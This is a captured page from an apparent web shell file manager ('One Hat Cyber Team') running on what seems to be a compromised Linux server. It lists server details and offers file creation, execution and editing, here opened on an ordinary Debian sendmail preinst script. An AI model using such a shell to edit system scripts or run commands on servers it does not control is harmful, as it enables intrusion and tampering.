One Hat Cyber Team
Your IP :
13.58.187.29
Server IP :
104.21.16.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
lib
/
dpkg
/
info
/
Edit File:
sendmail-bin.preinst
#!/bin/sh set -e; # do we have debconf? if [ -f /usr/share/debconf/confmodule ]; then DEBCONF=true; . /usr/share/debconf/confmodule; else DEBCONF=''; fi; if [ "$1" = "upgrade" ]; then # Prevent cronjob from running during upgrade... if [ -f /etc/cron.d/sendmail ]; then echo "#preinst" > /etc/cron.d/sendmail; fi; if dpkg --compare-versions "$2" lt-nl "8.15.2-19" ; then # stop sendmail before binaries get moved from /usr/lib/sm.bin/ to /usr/libexec/sendmail/ invoke-rc.d sendmail stop fi fi
Simpan